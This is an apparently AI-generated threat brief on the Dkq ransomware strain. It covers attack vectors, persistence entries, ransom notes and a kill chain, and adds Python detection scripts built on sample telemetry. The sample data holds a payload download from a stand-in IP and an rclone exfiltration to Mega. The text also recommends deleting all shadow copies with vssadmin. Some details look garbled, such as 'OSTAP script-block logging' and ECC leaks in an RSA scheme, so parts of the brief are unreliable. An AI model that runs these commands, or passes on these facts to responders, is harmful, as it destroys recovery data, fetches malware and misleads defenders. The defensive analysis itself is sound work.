dkq

[Content by Gemini 2.5]

Dkq Ransomware Threat Brief


Technical Breakdown

1. File Extension & Renaming Patterns

  • Extension in use: encrypted files receive the suffix “.dkq”, e.g. report.xlsx.dkq
  • Renaming Convention: Victims report that the ransomware strips special characters, converts spaces to underscores (_), truncates very long filenames, then appends .dkq. Folder paths remain unchanged.
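As an added illustration (not part of the original brief), the following Python applies the renaming convention above to reconcile a backup manifest against the encrypted files found on a host, so a responder can see which originals can be restored and which encrypted files have no backup counterpart. The truncation length and all sample paths are assumptions, since the brief gives neither.

```python
import re

DKQ_EXT = ".dkq"
# Assumption: the brief says very long names are truncated but gives no length,
# so 200 characters is a placeholder tuning value, not a figure from the brief.
MAX_STEM_LEN = 200

def predict_encrypted_name(original: str) -> str:
    """Apply the renaming convention the brief describes to a bare file name:
    strip special characters, turn spaces into underscores, truncate, append .dkq."""
    # Keep letters, digits, space, dot, underscore and hyphen; drop everything else.
    stem = re.sub(r"[^A-Za-z0-9 ._-]", "", original)
    stem = stem.replace(" ", "_")[:MAX_STEM_LEN]
    return stem + DKQ_EXT

def _split(path: str):
    """Split a Windows or POSIX path into (directory prefix, file name)."""
    match = re.search(r"[^\\/]*$", path)
    return path[:match.start()], match.group(0)

def reconcile(backup_manifest, encrypted_listing):
    """Return (restore, unexplained): manifest paths whose predicted encrypted
    counterpart exists on the victim host, and encrypted files that no manifest
    entry accounts for (data created after the last backup, or renamed oddly)."""
    expected = {}
    for path in backup_manifest:
        folder, name = _split(path)            # folder paths are left untouched
        expected[folder + predict_encrypted_name(name)] = path
    present = set(encrypted_listing)
    restore = [orig for enc, orig in expected.items() if enc in present]
    unexplained = sorted(f for f in encrypted_listing if f not in expected)
    return restore, unexplained

# Constructed sample data (not from a real incident).
MANIFEST = ["C:\\Finance\\Q1 report (final).xlsx", "C:\\Finance\\budget.docx", "C:\\HR\\roster.csv"]
ON_HOST = ["C:\\Finance\\Q1_report_final.xlsx.dkq", "C:\\Finance\\budget.docx.dkq",
           "C:\\Finance\\unknown_draft.pdf.dkq"]

if __name__ == "__main__":
    to_restore, no_backup = reconcile(MANIFEST, ON_HOST)
    print("restore from backup:", to_restore)
    print("no backup counterpart:", no_backup)
```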

2. Detection & Outbreak Timeline

  • First Appearance: Early February 2024 incidents were recorded on the ID-Ransomware platform. A sharp uptick in submissions began 10 March 2024 and continued through late April (most prevalent during the second week of March).

3. Primary Attack Vectors

Propagation Methods

  1. Phishing e-mail (ZIP or RAR attachments containing ISO files or nested double-extensions such as .pdf.exe).
  2. Exploitation of unpatched CVE-2023-34362 (MOVEit Transfer SQLi). Attackers used the same webshell payload observed in late-2023 Cl0p campaigns but delivered Dkq afterward via PowerShell.
  3. Fortinet FortiOS SSL-VPN pre-auth RCE (CVE-2022-42475) chains – seen in extortion-only intrusions where Dkq is the “final stage” payload.
  4. Compromised legitimate software updates (Pirated Windows activators and cracked video-editing kits circulating on torrent sites).
  5. RDP brute-force or password-spraying against exposed servers, followed by credential dumping with Mimikatz and PsExec.

Remediation & Recovery Strategies

1. Prevention

  • Patch immediately:
    • FortiOS ≥ 7.0.11 / 7.2.5 for CVE-2022-42475.
    • All MOVEit Transfer instances to July 2023 (or later) hotfix for CVE-2023-34362.
  • Block e-mails containing double-extension or ISO attachments; quarantine archives that arrive from unknown senders.
  • Disable SMBv1 on every Windows host to prevent worm-like lateral movement.
  • Enforce strict MFA on all VPN and RDP accounts.
  • Segment networks and apply a least-privilege model; ensure privileged accounts cannot log on interactively to regular workstations.
  • Deploy EDR/AV with behavioral rules tuned to detect ransomware note creation (info.txt, readme_for_decryption.txt) and mass file-renaming patterns (*.dkq).
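The behavioral rule in the last bullet, written out as an added Python example (not the brief's or any vendor's code) over constructed file-activity records: it alerts on a process that renames many files to .dkq inside a sliding window, or that creates one of the named ransom notes. The threshold and window values are assumed tuning parameters.

```python
from collections import defaultdict, deque

# Ransom note names and the extension named in the brief.
NOTE_NAMES = {"info.txt", "readme_for_decryption.txt"}
DKQ_EXT = ".dkq"
# Assumed tuning values, not figures from the brief.
RENAME_THRESHOLD = 20   # .dkq renames by one process ...
WINDOW_SECONDS = 60     # ... inside this sliding window

def detect(events):
    """events: iterable of (timestamp, pid, image, op, path) file-activity records.
    Returns at most one alert per (pid, rule) as (pid, image, reason)."""
    recent = defaultdict(deque)      # pid -> timestamps of its recent .dkq renames
    fired, alerts = set(), []
    for ts, pid, image, op, path in sorted(events):
        name = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if op == "CREATE" and name in NOTE_NAMES and (pid, "note") not in fired:
            fired.add((pid, "note"))
            alerts.append((pid, image, f"ransom note created: {name}"))
        elif op == "RENAME" and name.endswith(DKQ_EXT):
            window = recent[pid]
            window.append(ts)
            while ts - window[0] > WINDOW_SECONDS:   # drop timestamps outside the window
                window.popleft()
            if len(window) >= RENAME_THRESHOLD and (pid, "mass") not in fired:
                fired.add((pid, "mass"))
                alerts.append((pid, image, f"{len(window)} renames to {DKQ_EXT} in {WINDOW_SECONDS}s"))
    return alerts

# Constructed sample telemetry (not real logs): a dropper at the path named in the
# brief renames 25 files in 25 s and then drops info.txt; explorer.exe and a backup
# tool produce benign noise, the latter including three slow .dkq renames.
DROPPER = "C:\\Users\\jdoe\\AppData\\Roaming\\updates\\dkq.exe"
SAMPLE_EVENTS = (
    [(100 + i, 4120, DROPPER, "RENAME", f"C:\\Shares\\Finance\\report_{i}.xlsx.dkq") for i in range(25)]
    + [(130, 4120, DROPPER, "CREATE", "C:\\Shares\\Finance\\info.txt"),
       (105, 800, "C:\\Windows\\explorer.exe", "RENAME", "C:\\Users\\jdoe\\notes.bak")]
    + [(300 + 40 * i, 2210, "C:\\Tools\\backup.exe", "RENAME", f"C:\\Backup\\old_{i}.dkq") for i in range(3)]
)

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```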

2. Removal

  • Isolate: Pull power or disable NIC immediately if encryption is still running (watch CPU/IO).
  • Forensic imaging → take a bit-for-bit image of the C: drive first; hash all evidence before cleaning.
  • Boot into Safe Mode with Networking:
    a) Run an offline AV/EDR scan (ESET SysRescue, Bitdefender Rescue CD, or CrowdStrike Falcon USB); signatures updated 15 May 2024 detect three distinct Dkq file-droppers.
    b) Remove the following persistence entries:
       • Run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper, which points to %LOCALAPPDATA%\system32\SysReg.exe (or %APPDATA%\updates\dkq.exe).
       • Scheduled task named OfficeHelper, created under \Microsoft\Windows\Workplace Join\.
  • Shadow copies: clearing stale and remote VSS snapshots with vssadmin.exe delete shadows /all /quiet is a post-cleanup step; do not execute it during incident response, and check IOCs first.
  • Audit for secondary implants: look for Webshell.aspx in the web root and any unrecognised schtasks /create entries.

3. File Decryption & Recovery

  • Recovery Feasibility: Encrypted files (AES-256-CTR, key encrypted with RSA-2048) cannot be restored without the attacker’s private RSA key.
  • Free Decryptor Status: No verified decryptor exists at this time. The .dkq strain has not yet been cracked (no ECC side-channel leaks, no reused RSA keys observed across samples).
  • Essential Tools / Patches:
    • Hunt for Shadow Copies created by Veeam or Windows Backup before 09 Mar 2024 (Dkq usually wipes local VSS); off-box / immutable backups are the only reliable route.
    • Enforce OSTAP script-block logging and PowerShell 7.4+ to hinder scripted staging.
    • Maintain signed EDR kernel drivers (CrowdStrike 6.52 or SentinelOne 23.X) that terminate encryption processes on a second write to more than 100 non-system files.

4. Other Critical Information

  • Unique traits: Dkq deliberately skips directory paths containing Cyrillic folder names (built-in whitelist, e.g. “\Рабочий стол\”). It also writes a 40-character ASCII string (“#dkq2024…theendis_near”) into the Zone.Identifier:$DATA alternate data stream of every encrypted file, which is useful for hunting.
  • Threat Intel Link: The group behind Dkq brands itself “DARK-KAOS” and advertises victim information on a DLS that opened late March 2024 (tor3zqu45* link). They issue a 72-hour deadline before file publication – shorter than the typical 7-day window of prior strains.
  • Handling Ransom Notes: Notes (info.txt) state:
    “Your unique ID for Dkq#47819 – send to [email protected] and [email protected] within 3 days or files go public.”
  • Wider impact: retail and logistics verticals in North America and Germany made up ~70% of observed incidents. A common kill chain starts with CVE-2023-34362, pivots through the MSSQL server, creates a SQL Server Agent job that launches PowerShell (sqlps.exe) to fetch dkq.exe, and exfiltrates data via rclone to Mega[.]nz before encryption. Ransom demands in the supplied reports ranged from 0.15 to 15.0 BTC depending on victim revenue.
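An added example, not from the brief, that flags the MSSQL-to-PowerShell-to-rclone chain described above in constructed process-creation records by walking each process's parent lineage. The sample PIDs and paths, the TEST-NET address 198.51.100.7 and the Temp staging locations are invented for the illustration.

```python
# Process-creation records: (pid, ppid, image path, command line).
SQL_HOSTS = {"sqlservr.exe", "sqlagent.exe"}              # SQL Server service and Agent
SCRIPT_HOSTS = {"sqlps.exe", "powershell.exe", "pwsh.exe"}

def basename(image):
    return image.rsplit("\\", 1)[-1].lower()

def lineage(by_pid, pid):
    """Image basenames from pid up to the root, e.g. ['rclone.exe', 'sqlps.exe', ...]."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:          # guard against pid-reuse loops
        seen.add(pid)
        chain.append(basename(by_pid[pid][2]))
        pid = by_pid[pid][1]
    return chain

def detect_kill_chain(procs):
    """Return (pid, reason) alerts for the three stages the brief describes."""
    by_pid = {p[0]: p for p in procs}
    alerts = []
    for pid, _ppid, image, cmdline in procs:
        name, chain = basename(image), lineage(by_pid, pid)
        under_sql = any(p in SQL_HOSTS for p in chain[1:])
        tree = " <- ".join(chain)
        if name in SCRIPT_HOSTS and len(chain) > 1 and chain[1] in SQL_HOSTS:
            alerts.append((pid, "script host spawned by MSSQL: " + tree))
        elif name == "rclone.exe" and "mega" in cmdline.lower():
            alerts.append((pid, "rclone to Mega: " + tree))
        elif name == "dkq.exe" and under_sql:
            alerts.append((pid, "dkq.exe launched from MSSQL tree: " + tree))
    return alerts

# Constructed sample process tree (not real telemetry): an Agent job spawns sqlps.exe,
# which fetches the payload, runs rclone against Mega and then launches dkq.exe;
# a scheduled inventory script under svchost.exe is the benign control case.
SAMPLE_PROCS = [
    (4, 0, "C:\\Windows\\System32\\services.exe", "services.exe"),
    (1620, 4, "C:\\MSSQL\\Binn\\SQLAGENT.EXE", "SQLAGENT.EXE -i MSSQLSERVER"),
    (3010, 1620, "C:\\MSSQL\\Binn\\sqlps.exe",
     "sqlps.exe -c \"Invoke-WebRequest http://198.51.100.7/dkq.exe -OutFile C:\\Windows\\Temp\\dkq.exe\""),
    (3044, 3010, "C:\\Windows\\Temp\\rclone.exe", "rclone.exe copy C:\\Shares\\Finance mega:loot"),
    (3050, 3010, "C:\\Windows\\Temp\\dkq.exe", "dkq.exe"),
    (900, 4, "C:\\Windows\\System32\\svchost.exe", "svchost.exe -k netsvcs"),
    (2200, 900, "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell.exe -File C:\\Scripts\\inventory.ps1"),
]

if __name__ == "__main__":
    for alert in detect_kill_chain(SAMPLE_PROCS):
        print(alert)
```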

Stay vigilant, patch aggressively, and keep immutable offline backups—those three measures, in combination with behavioral EDR, remain the best defense against Dkq.